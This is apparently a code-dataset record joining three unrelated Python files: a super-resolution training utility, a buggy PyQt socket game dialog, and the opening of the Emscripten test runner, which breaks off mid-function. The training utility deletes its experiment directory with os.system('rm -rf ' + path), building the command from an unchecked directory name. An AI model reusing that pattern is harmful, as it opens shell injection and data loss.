self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
try:
self.log = torch.load(self.get_path('psnr_log.pt'))
except RuntimeError:
self.log = torch.jit.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
#self.n_processes = 1
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
#def save(self, trainer, epoch, is_best=False):
# trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
def save(self, trainer, epoch, dataset_name, is_best=False, is_latest=False):
trainer.model.save(self.get_path('model'), epoch, dataset_name, is_best=is_best, is_latest=is_latest)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
#log_size = self.log[:, idx_data, idx_scale].numpy().shape[0]
#axis = np.linspace(1, log_size, log_size)
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
#print("filename: ", filename)
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
if self.args.multi_scale_infer and p=='SR':
for scale_index, sr_image in enumerate(v):
#print(v[scale_index].shape)
normalized = v[scale_index][0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}x{}m_{}.png'.format(filename, self.args.scale[scale_index], p), tensor_cpu))
else:
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
self.scheduler.step(epoch)
#if epoch > 1:
# for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
#return self.scheduler.get_last_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
onlineDialog.py | import sys, socket, json, threading
from PyQt5.QtWidgets import QDialog, QLabel, QApplication, QGridLayout, QLineEdit, QSpinBox, QPushButton, QHBoxLayout
from PyQt5.QtCore import QRect, QBasicTimer
from PyQt5.QtGui import QPainter, QColor
class OnlineDialog(QDialog):
IP = ''
host = 1024
table = 1
pid = None
# receiverThread = None
status = 0
# 0:connecting 1:waiting 2:my turn
def __init__(self, sock, connectEvent):
self.connectEvent = connectEvent
self.socket = sock
super().__init__()
self.initUI()
def initUI(self):
self.setWindowTitle('Get online')
self.resize(400, 300) # set dialog size to 400*3Q00
self.grid = QGridLayout(self)
self.iplb = QLabel("IP:",self) # add a label to this dialog
self.grid.addWidget(self.iplb, 1, 1)
self.ipEdit = QLineEdit(self)
self.ipEdit.textChanged[str].connect(self.onChange1)
self.grid.addWidget(self.ipEdit, 1, 2)
self.hostlb = QLabel("Host: ",self) # add a label to this dialog
self.grid.addWidget(self.hostlb, 2, 1)
self.hostEdit = QSpinBox(self)
self.hostEdit.valueChanged.connect(self.onChange2)
self.hostEdit.setMinimum(1024)
# self.hostEdit.setValue(8080)
self.hostEdit.setMaximum(65535)
self.grid.addWidget(self.hostEdit, 2, 2)
# TODO connection password
# self.pwdlb = QLabel("Password: ",self) # add a label to this dialog
# self.grid.addWidget(self.pwdlb, 3, 1) # set label position and size
# self.pwdEdit = QLineEdit(self)
# self.grid.addWidget(self.pwdEdit)
self.tablelb = QLabel("Table:", self)
self.grid.addWidget(self.tablelb, 4, 1)
self.tableEdit = QSpinBox(self)
self.tableEdit.valueChanged.connect(self.onChange3)
self.tableEdit.setMinimum(1)
self.tableEdit.setMaximum(5)
self.grid.addWidget(self.tableEdit, 4, 2)
self.hbox = QHBoxLayout()
self.grid.addLayout(self.hbox, 5, 2)
self.hbox.setContentsMargins(180, 0, 0, 0)
self.cancelButton = QPushButton('Cancel', self)
self.hbox.addWidget(self.cancelButton)
self.cancelButton.pressed.connect(self.cancelButtonEvent)
self.okButton = QPushButton('OK',self)
self.hbox.addWidget(self.okButton)
self.okButton.pressed.connect(self.OK)
self.statusBar = QLabel(self)
self.grid.addWidget(self.statusBar, 5, 1)
self.setLayout(self.grid)
# self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.show()
def cancelButtonEvent(self):
if self.receiverThread and self.status == 1:
self.receiverThread
def onChange1(self, text):
self.IP = text
def onChange2(self, text):
self.host = text
def onChange3(self, text):
self.table = text
def OK(self):
self.statusBar.setText('Connecting...')
self.receiverThread = threading.Thread(target=self.receiverThreadFunction)
self.receiverThread.start()
def receiverThreadFunction(self):
if self.pid == 0:
while True:
try:
self.socket.connect((self.IP, self.host))
print("debug#1")
# self.statusBar.setText('Your id:\n'+self.socket.recv(17).decode('utf-8'))
# self.pid = self.socket.recv(17).decode('utf-8')
self.socket.send(json.dumps({"cmd":"a", "table":self.table}).encode('utf-8'))
print("debug#2")
while True:
print("debug#3")
get = self.socket.recv(32).decode('utf-8')
try:
print('debug#4:', get)
recv = json.loads(get)
except json.decoder.JSONDecodeError:
print('debug#5:', get)
continue
if recv['cmd'] == 's':
print("done!")
self.accept()
self.connectEvent()
self.status = 1
# return
elif recv['cmd'] == 'f':
self.statusBar.setText(recv['reason'])
self.socket.close()
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.receiverThread = None
return
# break
except ConnectionRefusedError:
self.statusBar.setText('Connection \nrefused!')
self.statusBar.setText(recv['reason'])
self.socket.close()
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.receiverThread = None
return
except OSError as ex:
print(str(ex))
self.statusBar.setText("OS\nError!")
self.statusBar.setText(recv['reason'])
self.socket.close()
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.receiverThread = None
return
if self.status != 0:
break
if self.status == 1:
while True:
while True:
try:
self.socket.recv(8)
# TODO receive EOL
except BlockingIOError:
break
# TODO return data
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = OnlineDialog(socket.socket(), lambda: 0)
sys.exit(app.exec_())
threading.Thread() |
runner.py | #!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
import sys
# The emscripten test suite explcitly requires python3.6 or above.
if sys.version_info < (3, 6):
print('error: emscripten requires python 3.6 or above', file=sys.stderr)
sys.exit(1)
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import shlex
import shutil
import string
import subprocess
import stat
import tempfile
import time
import unittest
import webbrowser
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import clang_native
import jsrun
import parallel_testsuite
from jsrun import NON_ZERO
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, EMXX, DEBUG
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import MACOS, WINDOWS
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, try_delete
from tools.shared import asbytes, Settings
from tools import shared, line_endings, building
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger("runner")
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# TODO(sbc): Remove this check for the legacy name once its been around for a while.
assert 'EM_SAVE_DIR' not in os.environ, "Please use EMTEST_SAVE_DIR instead of EM_SAVE_DIR"
EMTEST_SAVE_DIR = int(os.getenv('EMTEST_SAVE_DIR', '0'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_LACKS_NATIVE_CLANG = os.getenv('EMTEST_LACKS_NATIVE_CLANG')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0')) or shared.DEBUG
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
@contextlib.contextmanager
def js_engines_modify(replacements):
"""A context manager that updates shared.JS_ENGINES."""
original = shared.JS_ENGINES
shared.JS_ENGINES = replacements
try:
yield
finally:
shared.JS_ENGINES = original
@contextlib.contextmanager
def wasm_engines_modify(replacements):
"""A context manager that updates shared.WASM_ENGINES."""
original = shared.WASM_ENGINES
shared.WASM_ENGINES = replacements
try:
yield
finally:
shared.WASM_ENGINES = original
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
def make_executable(name):
os.chmod(name, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'strict',
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic library support in asan yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.env = {}
self.temp_files_before_run = []
self.uses_es6 = False
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when EMTEST_SAVE_DIR we still try to start with an empty directoy as many tests
# expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_test_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_test_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_test_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
# use --quiet once its available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
try:
shared.run_process(es_check + ['es5', os.path.abspath(filename)], stderr=PIPE)
except subprocess.CalledProcessError as e:
print(e.stderr)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False,
post_build=None, js_outfile=True):
suffix = '.js' if js_outfile else '.wasm'
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
compiler = [EMXX]
else:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# We link with C++ stdlibs, even when linking with emcc for historical reasons. We can remove
# this if this issues is fixed.
compiler = [EMCC, '-nostdlib++']
dirname, basename = os.path.split(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + \
['-I.', '-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
libraries
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and not self.uses_es6:
self.verify_es5(output)
if post_build:
post_build(output)
if js_outfile and self.uses_memory_init_file():
src = open(output).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[], output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
error = None
if EMTEST_VERBOSE:
print(f"Running '{filename}' under '{engine}'")
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertIdenticalUrlEncoded(self, expected, actual, **kwargs):
"""URL decodes the `actual` parameter before checking for equality."""
self.assertIdentical(expected, unquote(actual), **kwargs)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
